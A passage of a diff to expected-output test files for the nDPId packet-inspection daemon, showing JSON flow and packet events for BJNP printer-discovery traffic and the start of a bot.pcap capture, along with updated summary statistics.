+00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1467725378685,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725378685,"pkt":"RQAALAmDAAB5EfxOwKi5jcCoARHDpyGkABg0Q0JKTlACAQAAF6QAAAAAAADK6w=="} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725378685,"flow_last_seen":1467725378685,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725378685,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.17","src_port":50087,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383705,"flow_last_seen":1467725383705,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383705,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.1","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1467725383705,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725383705,"pkt":"RQAALAmRAAB5EfxQwKi5jcCoAQHDqSGkABg0T0JKTlACAQAAF6YAAAAAAACF3A=="} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383705,"flow_last_seen":1467725383705,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383705,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.1","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383909,"flow_last_seen":1467725383909,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383909,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.2","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1467725383909,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725383909,"pkt":"RQAALAmSAAB5EfxOwKi5jcCoAQLDqSGkABg0TUJKTlACAQAAF6cAAAAAAAAfDQ=="} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725383909,"flow_last_seen":1467725383909,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725383909,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.2","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384113,"flow_last_seen":1467725384113,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384113,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.3","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1467725384113,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384113,"pkt":"RQAALAmTAAB5EfxMwKi5jcCoAQPDqSGkABg0S0JKTlACAQAAF6gAAAAAAACCRA=="} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384113,"flow_last_seen":1467725384113,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384113,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.3","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384313,"flow_last_seen":1467725384313,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384313,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.4","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1467725384313,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384313,"pkt":"RQAALAmVAAB5EfxJwKi5jcCoAQTDqSGkABg0SUJKTlACAQAAF6kAAAAAAADs+w=="} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384313,"flow_last_seen":1467725384313,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384313,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.4","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384517,"flow_last_seen":1467725384517,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384517,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.5","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1467725384517,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384517,"pkt":"RQAALAmWAAB5EfxHwKi5jcCoAQXDqSGkABg0R0JKTlACAQAAF6oAAAAAAADhdg=="} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384517,"flow_last_seen":1467725384517,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384517,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.5","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384721,"flow_last_seen":1467725384721,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384721,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.6","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1467725384721,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384721,"pkt":"RQAALAmXAAB5EfxFwKi5jcCoAQbDqSGkABg0RUJKTlACAQAAF6sAAAAAAACzRQ=="} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384721,"flow_last_seen":1467725384721,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384721,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.6","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384921,"flow_last_seen":1467725384921,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384921,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.7","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1467725384921,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725384921,"pkt":"RQAALAmYAAB5EfxDwKi5jcCoAQfDqSGkABg0Q0JKTlACAQAAF6wAAAAAAAC5aQ=="} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725384921,"flow_last_seen":1467725384921,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725384921,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.7","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385125,"flow_last_seen":1467725385125,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385125,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.8","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00435{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1467725385125,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725385125,"pkt":"RQAALAmaAAB5EfxAwKi5jcCoAQjDqSGkABg0QUJKTlACAQAAF60AAAAAAACvDw=="} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385125,"flow_last_seen":1467725385125,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385125,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.8","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385329,"flow_last_seen":1467725385329,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.9","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1467725385329,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":46,"pkt_l4_len":24,"thread_ts_msec":1467725385329,"pkt":"RQAALAmbAAB5Efw+wKi5jcCoAQnDqSGkABg0P0JKTlACAQAAF64AAAAAAABjbw=="} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725385329,"flow_last_seen":1467725385329,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.9","src_port":50089,"dst_port":8612,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725378685,"flow_last_seen":1467725378685,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.17","src_port":50087,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725385329,"flow_last_seen":1467725385329,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.9","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725385125,"flow_last_seen":1467725385125,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.8","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384921,"flow_last_seen":1467725384921,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.7","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384721,"flow_last_seen":1467725384721,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.6","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384517,"flow_last_seen":1467725384517,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.5","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384313,"flow_last_seen":1467725384313,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.4","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725384113,"flow_last_seen":1467725384113,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.3","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725383909,"flow_last_seen":1467725383909,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.2","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467725383705,"flow_last_seen":1467725383705,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725385329,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.1","src_port":50089,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BJNP","breed":"Acceptable","category":"System"}} +00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":10,"total-skipped-flows":0,"total-l4-data-len":160,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":10,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":10,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":43,"global_ts_msec":1467725385329} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ -~~ packets captured/processed: 10/0 +~~ packets captured/processed: 10/10 ~~ skipped flows.............: 0 -~~ total layer4 data length..: 0 bytes -~~ total detected protocols..: 0 -~~ total active/idle flows...: 0/0 +~~ total layer4 data length..: 160 bytes +~~ total detected protocols..: 10 +~~ total active/idle flows...: 10/10 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5099937 bytes -~~ total memory freed........: 5099937 bytes -~~ total allocations/frees...: 113310/113310 +~~ total memory allocated....: 5108947 bytes +~~ total memory freed........: 5108947 bytes +~~ total allocations/frees...: 113350/113350 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ json string min len.......: 175 chars -~~ json string max len.......: 551 chars -~~ json string avg len.......: 361 chars +~~ json string min len.......: 440 chars +~~ json string max len.......: 682 chars +~~ json string avg len.......: 560 chars diff --git a/test/results/bot.pcap.out b/test/results/bot.pcap.out index e73ae6042..27b0d5e06 100644 --- a/test/results/bot.pcap.out +++ b/test/results/bot.pcap.out @@ -1,11 +1,11 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"bot.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bot.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1645108240233} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1645108240233,"flow_last_seen":1645108240233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1645108240233,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1645108240233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1645108240233,"pkt":"AFBWtlQQQFU5D63CgQAATQgARQIAMBFSQABuBooHKE2nJFkfSNz9AABQtwbJ7AAAAABwwvrwl9EAAAIEBaABAQQC"} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1645108240233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"thread_ts_msec":1645108240233,"pkt":"AAAMB6wytJaRl+L8gQAATQgARQAAMAAAQAA\/BspbWR9I3ChNpyQAUP0AWPWTl7cGye1wEnIQNMAAAAIEBbQBAQQC"} 